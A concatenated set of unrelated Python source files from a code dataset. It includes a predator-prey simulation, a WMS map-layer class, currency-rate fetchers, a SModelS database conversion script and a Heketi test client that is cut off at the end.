prey lose 30% of strength (Because both either ran, or fought, or all together)\n\n#An animal whose power has expired dies. (You can check the strength at the time of food search)\n\n#The game continues as long as predators are present in the forest.\n\nfrom __future__ import annotations\nfrom typing import Dict, Any\nfrom abc import ABC, abstractmethod\nimport random\nimport uuid\nimport time\n\n\nclass Animal(ABC):\n\n def __init__(self, power: int, speed: int):\n self.id = None\n self.max_power = power\n self.current_power = power\n self.speed = speed\n\n @abstractmethod\n def eat(self, forest: Forest):\n raise NotImplementedError\n\n\nclass Predator(Animal):\n def __init__(self, power: int, speed: int):\n super().__init__(power, speed)\n self.id = None\n self.max_power = power\n self.current_power = power\n self.speed = speed\n\n def eat(self, forest: Forest):\n target = random.choice(list(forest.animals.values()))\n if target.id == self.id:\n print('Predator did not find animals in forest')\n else:\n if (self.speed > target.speed) and (self.current_power > target.current_power):\n print('Predator eating...')\n tmp = self.current_power\n self.current_power = min(self.current_power + self.max_power * 0.5, self.max_power)\n print(f'Predator restored {self.current_power - tmp} power')\n forest.animals[target.id].current_power = 0\n else:\n print('Predator did not caught target, both are tired')\n self.current_power = self.current_power - 0.3 * self.max_power\n forest.animals[target.id].current_power = forest.animals[target.id].current_power - 0.3 * \\\n forest.animals[target.id].max_power\n\n def __str__(self):\n return f'{self.__class__.__name__}'\n\n\nclass Herbivorous(Animal):\n def __init__(self, power: int, speed: int):\n super().__init__(power, speed)\n self.id = None\n self.max_power = power\n self.current_power = power\n self.speed = speed\n\n def __str__(self):\n return f'{self.__class__.__name__}'\n\n def eat(self, forest: Forest):\n print('Herbivorous eating...')\n tmp = self.current_power\n self.current_power = min(self.current_power + self.max_power * 0.5, self.max_power)\n print(f'Herbivorous restored {self.current_power - tmp} power')\n\n\nAnyAnimal = [Herbivorous, Predator]\n\n\nclass Forest:\n\n def __init__(self):\n self.animals: Dict[str, AnyAnimal] = dict()\n\n def add_animal(self, animal: AnyAnimal):\n print('There is new animal', animal)\n self.animals.update({animal.id: animal})\n\n def remove_animal(self, animal: AnyAnimal):\n print(animal, 'is removed from forest')\n self.animals.pop(animal.id)\n\n def any_predator_left(self):\n return not all(isinstance(animal, Herbivorous) for animal in self.animals.values())\n\n\ndef animal_generator():\n while True:\n generated_animal = random.choice((Predator(random.randint(25, 100), random.randint(25, 100)),\n Herbivorous(random.randint(25, 100), random.randint(25, 100))))\n generated_animal.id = uuid.uuid4()\n yield generated_animal\n\n\nif __name__ == \"__main__\":\n nature = animal_generator()\n\n forest = Forest()\n for i in range(10):\n animal = next(nature)\n forest.add_animal(animal)\n\n while True:\n animal_to_remove = []\n for animal in forest.animals.values():\n if animal.current_power < 1:\n animal_to_remove.append(animal.id)\n for animal_id in animal_to_remove:\n forest.remove_animal(forest.animals[animal_id])\n if not forest.any_predator_left():\n print('All predators is dead!')\n break\n for animal in forest.animals.values():\n animal.eat(forest=forest)\n time.sleep(1)\n","sub_path":"HW8.py","file_name":"HW8.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"331327256","text":"from os import listdir\n\nTrainIdx = []\nTestIdx = []\n\nTrainImgList = listdir(\"./PostProcessing Data/Training/\")\nfor Img in TrainImgList:\n Idx = Img[1:4]\n if Idx not in TrainIdx:\n TrainIdx.append(Idx)\nTrainIdx.sort()\n\nTestImgList = listdir(\"./PostProcessing Data/Test/\")\nfor Img in TestImgList:\n Idx = Img[1:4]\n if Idx not in TestIdx:\n TestIdx.append(Idx)\nTestIdx.sort()\n\nprint(\"Test: \")\nprint(TestIdx)\nprint(\"\\n ------------------------------- \\n\")\nprint(\"Train: \")\nprint(TrainIdx)\n\nfor Idx in TestIdx:\n if Idx in TrainIdx:\n print(Idx) # these appear in both sets\nprint(\"Finished checking\")","sub_path":"CNN with TL/PreviousScripts/CheckIndices.py","file_name":"CheckIndices.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"116188195","text":"import imp\nfrom mathutils import Matrix\nfrom arnold import *\n\nif \"bpy\" in locals():\n imp.reload(BaseLight)\nelse:\n import bpy\n from . import BaseLight\n\nclass PointLight(BaseLight.BaseLight):\n def __init__(self, light):\n super(PointLight,self).__init__(light)\n \n def write(self):\n self.alight = AiNode(b\"point_light\")\n AiNodeSetStr(self.alight,b\"name\",self.lightdata.name.encode('utf-8'))\n # set position\n # fist apply the matrix\n lmatrix = self.light.matrix_world\n tmatrix = mmatrix.transposed()\n AiArraySetMtx(matrices, 0 , tmatrix)\n AiNodeSetArray(self.alight, b\"matrix\", matrices)\n\n # Write common attributes\n super(PointLight,self).write()\n\n\n","sub_path":"PointLight.py","file_name":"PointLight.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"101347765","text":"#Entrada\nnumero = int(input('escreva o numero com 3 digitos: '))\n\n#Processamento\ncentena = int(numero/100)\ndezena = int((numero%100) // 10)\nunidade = int(numero)%((centena*100)+((dezena*10)))\n\n#Saida\nprint(f'{unidade}{dezena}{centena} e o inverso de {numero}')\n\n\n","sub_path":"q11_inverso_inteiro.py","file_name":"q11_inverso_inteiro.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"100813214","text":"# -*- coding: utf-8 -*-\n\n# Visigoth: A lightweight Python3 library for rendering data visualizations in SVG\n# Copyright (C) 2020 Niall McCarroll\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software\n# and associated documentation files (the \"Software\"), to deal in the Software without \n# restriction, including without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies or \n# substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING\n# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport os\nimport urllib\nfrom xml.dom.minidom import parseString\n\nfrom visigoth.common.image import Image\nfrom visigoth.utils.httpcache import HttpCache\nfrom visigoth.map_layers import MapLayer\nfrom visigoth.utils.js import Js\nfrom visigoth.utils.mapping import Projections\n\nclass WMS(MapLayer):\n\n mundialis_url = \"http://ows.mundialis.de/services/service?&VERSION=1.1.1\"\n\n gibs_4326_url = \"https://gibs.earthdata.nasa.gov/wms/epsg4326/best/wms.cgi?VERSION=1.1.1\"\n\n gibs_3857_url = \"https://gibs.earthdata.nasa.gov/wms/epsg3857/best/wms.cgi?VERSION=1.1.1\"\n\n gibs_attribution = (\"We acknowledge the use of imagery provided by services from NASA's Global Imagery Browse Services (GIBS), part of NASA's Earth Observing System Data and Information System (EOSDIS).\",\"https://earthdata.nasa.gov/\")\n mundialis_attribution = (\"Contains modified SRTM data (2014)/NASA, processed by mundialis (www.mundialis.de) and vector data by OpenStreetMap contributors (2020), www.openstreetmap.org\",\"https://www.mundialis.de/en/ows-mundialis/\")\n\n layer_lookup = {\n (\"satellite\",\"EPSG:3857\"):(gibs_3857_url,\"Landsat_WELD_CorrectedReflectance_TrueColor_Global_Annual\",gibs_attribution),\n (\"satellite\", \"EPSG:4326\"):(gibs_4326_url, \"Landsat_WELD_CorrectedReflectance_TrueColor_Global_Annual\",gibs_attribution),\n (\"osm\",\"EPSG:3857\"):(mundialis_url,\"OSM-WMS\",mundialis_attribution),\n (\"osm\",\"EPSG:4326\"):(mundialis_url,\"OSM-WMS\",mundialis_attribution),\n }\n\n \"\"\"\n Create a WMS plot\n\n Keyword Arguments:\n type(str): \"satellite\" or \"osm\"\n image(str): type of image, for example \"jpeg\", \"png\"\n layer_name(str): the name of the layer to use\n url(str): a URL with the following format strings %(height)d, %(width)d, %(e_min)f, %(e_max)f, %(n_min)f, %(n_max)f\n date(datetime): date for which imagery is requested\n attribution(str): a citation or acknowledgement for the data provider\n attribution_url(str): a URL for the data provider\n embed_images(bool): whether to download and embed images into the document or link to them\n \n Note: specify either (type AND image) OR (url)\n Note: WMS layer can only currently work with the default Web Mercator (EPSG:3857) or Platte-Carrerre (EPSG:4326) projection\n \"\"\"\n def __init__(self,\n type=\"satellite\",\n image=\"png\",\n layer_name=\"\",\n url=\"\",\n date=None,\n attribution=\"\",\n attribution_url=\"\",\n embed_images=True\n ):\n super(WMS, self).__init__()\n self.bounds = None\n self.width = None\n self.attribution = attribution\n self.attribution_url = attribution_url\n self.url = url\n self.date = date\n self.layer_name = layer_name\n self.projection = None\n self.type = type\n self.image = image\n self.content = {}\n self.embed_images = embed_images\n\n def configureLayer(self,ownermap,width,height,boundaries,projection,zoom_to,fmt):\n self.ownermap = ownermap\n self.width = width\n self.height = int(height)\n self.bounds = boundaries\n self.projection = projection\n self.zoom_to = zoom_to\n\n @staticmethod\n def getCapabilitiesUrl(base_url):\n scheme, netloc, path, query_string, fragment = urllib.parse.urlsplit(base_url)\n params = urllib.parse.parse_qs(query_string)\n keys = list(params.keys())\n for key in keys:\n if key != \"SERVICE\" and key != \"VERSION\":\n del params[key]\n\n if \"VERSION\" not in params:\n params[\"VERSION\"] = \"1.1.1\"\n\n params[\"SERVICE\"] = \"WMS\"\n params[\"REQUEST\"] = \"GetCapabilities\"\n query_string = urllib.parse.urlencode(params, doseq=True)\n return urllib.parse.urlunsplit((scheme, netloc, path, query_string, fragment))\n\n @staticmethod\n def getFeatureInfoUrl(parameters, x, y, type = \"satellite\",projection = Projections.EPSG_3857,layer_name=\"\", url = \"\"):\n projname = projection.getName()\n details = WMS.layer_lookup.get((type,projname), None)\n if not url:\n url = details[0]\n if not layer_name:\n layer_name = details[1]\n scheme, netloc, path, query_string, fragment = urllib.parse.urlsplit(url)\n params = urllib.parse.parse_qs(query_string)\n keys = list(params.keys())\n for key in keys:\n if key != \"SERVICE\" and key != \"VERSION\":\n del params[key]\n\n if \"VERSION\" not in params:\n params[\"VERSION\"] = \"1.1.1\"\n\n params[\"SRS\"] = projname\n params[\"TRANSPARENT\"] = \"true\"\n params[\"FORMAT\"] = \"image/%(image_type)s\" % (parameters)\n params[\"QUERY_LAYERS\"] = layer_name\n params[\"LAYERS\"] = layer_name\n\n params[\"HEIGHT\"] = \"%(height)d\" % (parameters)\n params[\"WIDTH\"] = \"%(width)d\" % (parameters)\n params[\"BBOX\"] = \"%(e_min)f,%(n_min)f,%(e_max)f,%(n_max)f\" % (parameters)\n params[\"X\"] = x\n params[\"Y\"] = y\n params[\"INFO_FORMAT\"] = \"text/xml\"\n\n if \"date\" in parameters:\n params[\"TIME\"] = parameters[\"date\"].strftime(\"%Y-%m-%d\")\n\n params[\"SERVICE\"] = \"WMS\"\n params[\"REQUEST\"] = \"GetFeatureInfo\"\n query_string = urllib.parse.urlencode(params, doseq=True)\n return urllib.parse.urlunsplit((scheme, netloc, path, query_string, fragment))\n\n @staticmethod\n def getMapUrl(base_url,parameters):\n # good concise summary of the WMS protocol\n # https://www.nrcan.gc.ca/earth-sciences/geomatics/canadas-spatial-data-infrastructure/standards-policies/8938\n scheme, netloc, path, query_string, fragment = urllib.parse.urlsplit(base_url)\n params = urllib.parse.parse_qs(query_string)\n if \"VERSION\" not in params:\n params[\"VERSION\"] = \"1.1.1\"\n if \"STYLES\" not in params:\n params[\"STYLES\"] = \"\"\n params[\"SERVICE\"] = \"WMS\"\n params[\"SRS\"] = \"%(projection)s\" % (parameters)\n params[\"TRANSPARENT\"] = \"true\"\n params[\"FORMAT\"] = \"image/%(image_type)s\" % (parameters)\n params[\"LAYERS\"] = \"%(layers)s\" % (parameters)\n params[\"HEIGHT\"] = \"%(height)d\" % (parameters)\n params[\"WIDTH\"] = \"%(width)d\" % (parameters)\n params[\"BBOX\"] = \"%(e_min)f,%(n_min)f,%(e_max)f,%(n_max)f\" % (parameters)\n params[\"REQUEST\"] = \"GetMap\"\n if \"date\" in parameters:\n params[\"TIME\"] = parameters[\"date\"].strftime(\"%Y-%m-%d\")\n\n\n query_string = urllib.parse.urlencode(params, doseq=True)\n return urllib.parse.urlunsplit((scheme, netloc, path, query_string, fragment))\n\n @staticmethod\n def getLayerNames(type = \"satellite\",projection = Projections.EPSG_3857,url = \"\"):\n projname = projection.getName()\n if not url:\n details = WMS.layer_lookup.get((type,projname), None)\n url = details[0]\n\n capabilities_url = WMS.getCapabilitiesUrl(url)\n\n # fire off the GetCapabilities request\n capabilities = HttpCache.fetch(capabilities_url)\n\n s = capabilities.decode(\"utf-8\")\n\n d = parseString(s)\n layer_names = []\n\n def getText(node):\n rc = []\n for childnode in node.childNodes:\n if childnode.nodeType == node.TEXT_NODE:\n rc.append(childnode.data)\n return ''.join(rc)\n\n layers = d.getElementsByTagName(\"Layer\")\n for layer in layers:\n names = layer.getElementsByTagName(\"Name\")\n for name in names:\n if name.parentNode == layer:\n layer_names.append(getText(name))\n\n return layer_names\n\n @staticmethod\n def getFeatureInfo(parameters, x, y, type=\"satellite\", projection=Projections.EPSG_3857,url=\"\"):\n info_url = WMS.getFeatureInfoUrl(parameters,x,y,type,projection,url=url)\n info = HttpCache.fetch(info_url)\n print(info.decode(\"utf-8\"))\n\n def getHeight(self):\n return self.height\n\n def getWidth(self):\n return self.width\n\n def build(self,fmt):\n url = self.url\n projname = self.projection.getName()\n attribution = self.attribution\n attribution_url = self.attribution_url\n if not url:\n details = WMS.layer_lookup.get((self.type,projname),None)\n if details is not None:\n (url,layer_name,attribution) = details\n (attribution,attribution_url) = attribution\n else:\n raise Exception(\"No WMS configuration for combination \"+str((self.type,projname)))\n if self.layer_name:\n layer_name = self.layer_name\n self.setInfo(name=\"WMS\", attribution=attribution, url=attribution_url)\n\n (lonmin,latmin) = self.bounds[0]\n (lonmax,latmax) = self.bounds[1]\n (xmin,ymin) = self.projection.fromLonLat((lonmin,latmin))\n (xmax,ymax) = self.projection.fromLonLat((lonmax,latmax))\n\n zoom = 1\n while zoom <= self.zoom_to:\n self.content[zoom] = {}\n for zx in range(zoom):\n for zy in range(zoom):\n x1 = xmin + zx*(xmax-xmin)/zoom\n x2 = xmin + (zx+1)*(xmax-xmin)/zoom\n y1 = ymin + zy*(ymax-ymin)/zoom\n y2 = ymin + (zy+1)*(ymax-ymin)/zoom\n parameters = {\n \"layers\":layer_name,\n \"projection\":projname,\n \"e_min\":x1,\n \"n_min\":y1,\n \"e_max\":x2,\n \"n_max\":y2,\n \"image_type\":self.image,\n \"width\":self.width,\n \"height\":self.height}\n if self.date != None:\n parameters[\"date\"] = self.date\n resolved_url = WMS.getMapUrl(url,parameters)\n if self.embed_images:\n try:\n self.content[zoom][(zx,zy)] = HttpCache.fetch(resolved_url)\n except:\n print(\"Unable to download WMS image from %s\"%(resolved_url))\n self.content[zoom][(zx, zy)] = b\"\"\n else:\n self.content[zoom][(zx, zy)] = resolved_url\n zoom *= 2\n\n\n def getBoundaries(self):\n return self.bounds\n\n def draw(self,doc,cx,cy):\n zoom_groups = []\n ox = cx - self.width/2\n oy = cy - self.height/2\n zoom = 1\n while zoom <= self.zoom_to:\n g = doc.openGroup()\n g.addAttr(\"pointer-events\",\"none\")\n if zoom != 1:\n g.addAttr(\"visibility\",\"hidden\")\n tw = self.width/zoom\n th = self.height/zoom\n for zx in range(zoom):\n for zy in range(zoom):\n i = None\n if self.embed_images:\n bytes = self.content[zoom][(zx,zy)]\n if bytes:\n i = Image(\"image/%s\"%(self.image),content_bytes=bytes,width=tw,height=th)\n else:\n url = self.content[zoom][(zx, zy)]\n i = Image(\"image/%s\" % (self.image), path_or_url=url, width=tw, height=th, embed_image=False)\n if i:\n i.draw(doc, ox + (zx + 0.5) * tw, oy + self.height - (zy + 0.5) * th)\n zoom_groups.append(g.getId())\n doc.closeGroup()\n zoom *= 2\n\n with open(os.path.join(os.path.split(__file__)[0],\"wms.js\"),\"r\") as jsfile:\n jscode = jsfile.read()\n config = { \"zoom_groups\":zoom_groups }\n Js.registerJs(doc,self,jscode,\"wms\",cx,cy,config)\n","sub_path":"visigoth/map_layers/wms/wms.py","file_name":"wms.py","file_ext":"py","file_size_in_byte":13070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"197488250","text":"# coding=utf-8\n\ndef exrate_twbank(output_currency,input_currency='TWD',*arg,**kwarg):\n\t__source__=\"\"\"\n\n此服務由台灣銀行\nhttps://rate.bot.com.tw/\n所提供\n\n\"\"\"\n\tfrom urllib import request\n\timport requests\n\timport csv\n\tfrom decimal import Decimal\n\tdata={}\n\turl = \"https://rate.bot.com.tw/xrt/flcsv/0/day\"\n\n\tdef csv_import(url):\n\t\timport io\n\t\tdata={}\n\t\turl_open = request.urlopen(url)\n\t\tcsvfile = csv.reader(io.TextIOWrapper(url_open, encoding = 'utf-8'), delimiter=',')\n\t\tindex=None\n\t\tindex_jump=True\n\t\tlength=None\n\t\tfor row in csvfile:\n\n\t\t\tif index_jump:\n\t\t\t\tindex_jump=False\n\t\t\t\tindex=row\n\t\t\t\tlength=len(index)\n\t\t\t\tcontinue\n\t\t\tdata[row[0]]={\n\t\t\t'本行買入':{\n\t\t\t\t'現金':row[2],\n\t\t\t\t'即期':row[3]\n\t\t\t\t},\n\t\t\t'本行賣出':{\n\t\t\t\t'現金':row[12],\n\t\t\t\t'即期':row[13]\n\t\t\t\t}\n\n\t\t\t}\n\n\n\n\t\treturn data\n\texrate_data=csv_import(url)\n\taim_data=exrate_data[output_currency]\n\treturn aim_data['本行賣出']['即期']\n\n\n\n\ndef exRate(input_currency,output_currency,*arg,**kwarg):\n\t__source__=\"\"\"\n\n此服務由即匯站\nhttps://tw.rter.info/howto_currencyapi.php\n所提供\n\n\"\"\"\n\timport requests\n\tfrom decimal import Decimal\n\tdata={}\n\tr=requests.get('https://tw.rter.info/capi.php')\n\tcurrency=r.json()\n\tusd2input=\"USD\"+input_currency.upper()\n\tusd2output=\"USD\"+output_currency.upper()\n\ttry:\n\t\toutput_data=currency[usd2input]['Exrate']/currency[usd2output]['Exrate']\n\t\tdealing=Decimal(output_data).quantize(Decimal('0.0000'))\n\t\tdata['Exrate']=float(dealing)\n\t\tdata['UTC']=currency[usd2input]['UTC']\n\texcept KeyError:\n\t\te_text=\"Unknown currency: \"+input_currency+\" > \"+output_currency\n\t\traise IndexError(e_text)\n\n\treturn data\n\ndef main():\n\ttry:\n\t\tdata=exrate_twbank(\"JPY\")\n\t\tprint(data)\n\t\t#print(\"Exrate:\\t\",data['Exrate'])\n\t\t#print(\"Time:\\t\",data['UTC'])\n\texcept IndexError as e:\n\t\tprint(e)\n\n\nif __name__==\"__main__\":\n\tmain()\n","sub_path":"module/RTER_api.py","file_name":"RTER_api.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"220342784","text":"#!/usr/bin/env python3\n\n\"\"\"\n.. module:: convert\n :synopsis: used to create info.txt and the .txt files.\n\n\"\"\"\nimport sys\nimport os\nimport argparse\nimport types\n\nargparser = argparse.ArgumentParser(description = \n'create info.txt, txname.txt, twiki.txt and sms.py')\nargparser.add_argument ('-utilsPath', '--utilsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargparser.add_argument ('-smodelsPath', '--smodelsPath', \nhelp = 'path to the package smodels_utils',\\\ntype = str )\nargs = argparser.parse_args()\n\nif args.utilsPath:\n utilsPath = args.utilsPath\nelse:\n databaseRoot = '../../../'\n sys.path.append(os.path.abspath(databaseRoot))\n from utilsPath import utilsPath\n utilsPath = databaseRoot + utilsPath\nif args.smodelsPath:\n sys.path.append(os.path.abspath(args.smodelsPath))\n\nsys.path.append(os.path.abspath(utilsPath))\nfrom smodels_utils.dataPreparation.inputObjects import MetaInfoInput,DataSetInput\nfrom smodels_utils.dataPreparation.databaseCreation import databaseCreator\nfrom smodels_utils.dataPreparation.massPlaneObjects import x, y, z\n\n\n\n#+++++++ global info block ++++++++++++++\ninfo = MetaInfoInput('CMS-PAS-SUS-17-004')\ninfo.url = 'http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/SUS-17-004/index.html'\ninfo.sqrts = 13\ninfo.lumi = 35.9\ninfo.prettyName = 'Multilepton EWK searches'\ninfo.private = False\ninfo.arxiv = ''\ninfo.contact = ''\ninfo.publication = ''\ninfo.comment = 'TChiHH, TChiZZ mass planes not provided. TChiWH/Z not implemented as BR(Chi20->H Chi10) = BR(Chi20->Chi10 Z)=0.5 provided for a single mass plane.'\ninfo.supersededBy = 'CMS-SUS-17-004'\n\n\n#+++++++ dataset block ++++++++++++++\ndataset = DataSetInput('data')\ndataset.setInfo(dataType = 'upperLimit', dataId = None)\n\n#+++++txName block +++++++++++++++++\n\nTChiWZ=dataset.addTxName('TChiWZ')\nTChiWZ.checked=''\nTChiWZ.constraint=\"[[['W']],[['Z']]]\"\nTChiWZ.condition=None\nTChiWZ.conditionDescription = None\nTChiWZ.source=\"CMS\"\n\n#offshell txName block\n\nTChiWZoff=dataset.addTxName('TChiWZoff')\nTChiWZoff.checked=''\nTChiWZoff.constraint=\"71.*([[['mu+','mu-']],[['l','nu']]] + [[['e+','e-']],[['l','nu']]])\"\nTChiWZoff.condition = \"cGtr([[['mu+','mu-']],[['l','nu']]],[[['e+','e-']],[['l','nu']]])\"\nTChiWZoff.massConstraint = [['dm < 86.0'], ['dm < 76.0']]\nTChiWZoff.conditionDescription=None\nTChiWZoff.source=\"CMS\"\n\n#++++++next mass plane block+++++++++\n\nTChiWZ_1 = TChiWZ.addMassPlane(2*[[x,y]])\nTChiWZ_1.figure='Fig. 8-a'\nTChiWZ_1.figureUrl='http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-a.png'\nTChiWZ_1.dataUrl='http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-a.root'\nTChiWZ_1.histoDataUrl='http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-a.root'\nTChiWZ_1.exclusionDataUrl='http://cms-results.web.cern.ch/cms-results/public-results/preliminary-results/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-a.root'\nTChiWZ_1.setSources(dataLabels=['expExclusion','expExclusionM1','expExclusionP1','obsExclusion','obsExclusionM1','obsExclusionP1','upperLimits'],\n dataFiles=['orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root','orig/CMS-PAS-SUS-17-004_Figure_008-a.root'],\n dataFormats=['canvas','canvas','canvas','canvas','canvas','canvas','canvas'],objectNames=['TChiWZ;1','TChiWZ;1','TChiWZ;1','TChiWZ;1','TChiWZ;1','TChiWZ;1','TChiWZ;1'],\n indices= [4, 6, 5, 7, 9, 8, 2],units=[None,None,None,None,None,None,'pb'])\n\nTChiWZoff.addMassPlane(TChiWZ_1)\n\n#++++++next txName block+++++++++++++++\n\nTChiWH=dataset.addTxName('TChiWH')\nTChiWH.checked=''\nTChiWH.constraint=\"[[['W']],[['higgs']]]\"\nTChiWH.condition=None\nTChiWH.conditionDescription=None\nTChiWH.source=\"CMS\"\n\n\n#++++++next mass plane block++++++++\nTChiWH_1 = TChiWH.addMassPlane(2*[[x,y]])\nTChiWH_1.figure='Fig. 8-b'\nTChiWH_1.figureUrl='http://cms-results.web.cern.ch/cms-results/public-results/publications/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-b.png'\nTChiWH_1.dataUrl='http://cms-results.web.cern.ch/cms-results/public-results/publications/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-b.root'\nTChiWH_1.histoDataUrl='http://cms-results.web.cern.ch/cms-results/public-results/publications/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-b.root'\nTChiWH_1.exclusionDataUrl='http://cms-results.web.cern.ch/cms-results/public-results/publications/PAS-SUS-17-004/CMS-PAS-SUS-17-004_Figure_008-c.root'\nTChiWH_1.setSources(dataLabels=['expExclusion','expExclusionM1','expExclusionP1','obsExclusion','obsExclusionM1','obsExclusionP1','upperLimits'],\n dataFiles=['orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root','orig/CMS-PAS-SUS-17-004_Figure_008-b.root'],\n dataFormats=['canvas','canvas','canvas','canvas','canvas','canvas','canvas'],objectNames=['TChiWH;1','TChiWH;1','TChiWH;1','TChiWH;1','TChiWH;1','TChiWH;1','TChiWH;1'],\n indices= [4, 6, 5, 7, 9, 8, 2],units=[None,None,None,None,None,None,'pb'])\n\ndatabaseCreator.create()\n\n","sub_path":"smodels-database/13TeV/CMS/CMS-PAS-SUS-17-004/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"532762020","text":"import argparse\nfrom functools import partial\n\nfrom ft.functions import function_list\nfrom ft.internal import add_dynamic_type\nfrom ft.error import panic\n\n\ndef get_function(name, args, enable_currying=True):\n try:\n function = function_list[name]\n except KeyError:\n panic(\"Command not found: '{}'\".format(name))\n\n if enable_currying:\n # Partially apply the command\n if len(args) > 0:\n args = map(add_dynamic_type, args)\n function = partial(function, *args)\n\n return function\n\n\ndef new_command(name, enable_currying=True):\n parser = argparse.ArgumentParser(description=name)\n parser.add_argument('function', help='the function to run for each input')\n parser.add_argument('args', help='optional arguments', nargs='*')\n parser.add_argument('--column', '-c', type=int, help='apply function to a specific column')\n\n args = parser.parse_args()\n\n command = get_function(args.function, args.args, enable_currying)\n\n return command, args\n","sub_path":"ft/ft/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"470555696","text":"import random\n\ndef get_word_list():\n word_list = []\n with open('sherlock_small.txt') as inputFile:\n for line in inputFile:\n line.rstrip()\n for char in line:\n char = char.replace('--', ' ')\n words = line.split()\n\n for word in words:\n word_list.append(word)\n return word_list\n\ndef create_word_dict():\n word_dict = {}\n words = get_word_list()\n for index in range(len(words) - 2):\n word_dict.setdefault((words[index], words[index + 1]), []).append(words[index + 2])\n return word_dict\n\nword_dict = create_word_dict()\nword_list = get_word_list()\nword_list_index = list(range(len(word_list)))\n\nstart_point = random.choice(word_list_index)\n\nnew_text = [word_list[start_point], word_list[start_point + 1]]\nword_pair = (word_list[start_point], word_list[start_point + 1])\n\ndef create_new_text(pair):\n if pair in word_dict:\n next_word = random.choice(word_dict[pair])\n new_text.append(next_word)\n create_new_text((pair[1], next_word))\n\ncreate_new_text(word_pair)\nprint(' '.join(new_text))\n","sub_path":"students/tonylee/Trigrams.py","file_name":"Trigrams.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"540813045","text":"# -*- coding:utf-8-*-\nimport unittest\nimport json\nimport os\nimport logging\nfrom requests.exceptions import ConnectionError\nfrom heketi import HeketiClient\nfrom cloudfly_heketi.admin_base import site\nfrom cloudfly_heketi.packaged.logger import logger\nfrom cloudfly_heketi.conf import conf\nfrom cloudfly_heketi.packaged.env_file import OSEnv\n\n\n\n\nc = HeketiClient(conf.HEKETI_SERVER, 'admin', conf.HEKETI_ADMIN_KEY)\ncluster_req = {}\n# c = HeketiClient(env_file.heketi_server,env_file.heketi_user,env_file.heketi_user_key)\n#\nclass Test_Heketi(unittest.TestCase,OSEnv):\n\n # host = OSEnv().heketi_url()\n # user = OSEnv().heketi_user()\n # key = OSEnv().heketi_user_key()\n # logger('设置Heketi连接方式')\n # c = HeketiClient(host,user,key)\n # cluster_req = {}\n\n def create_cluster(self):\n try:\n cluster_req['file'] = True\n cluster = c.cluster_create()\n cluster_func = cluster\n return cluster_func\n except ConnectionError as e:\n logger('%s' % e, logging.ERROR)\n return False\n\n def list_cluster(self):\n logger('已连接到cluster接口,获取数据中')\n logger('打印连接程序c: ' ,type(c.cluster_list()))\n list = c.cluster_list()\n print('list',type(list))\n return list\n\n def change_cluster(self,cid):\n cluster_setflags_req = {}\n cluster_setflags_req['block'] = False\n cluster_setflags_req['file'] = True\n ok = c.cluster_setflags(cid, cluster_setflags_req)\n self.assertTrue(ok)\n\n def del_cluster(self,cid):\n delete_cluster =c.cluster_delete(cid)\n return delete_cluster\n\n def info_cluster(self,cid):\n\n info=c.cluster_info(cid)\n logger('cluster_id:%s info %s' %(cid,info))\n return info\n\n def info_node(self,n_id):\n info = c.node_info(n_id)\n return info\n\n def 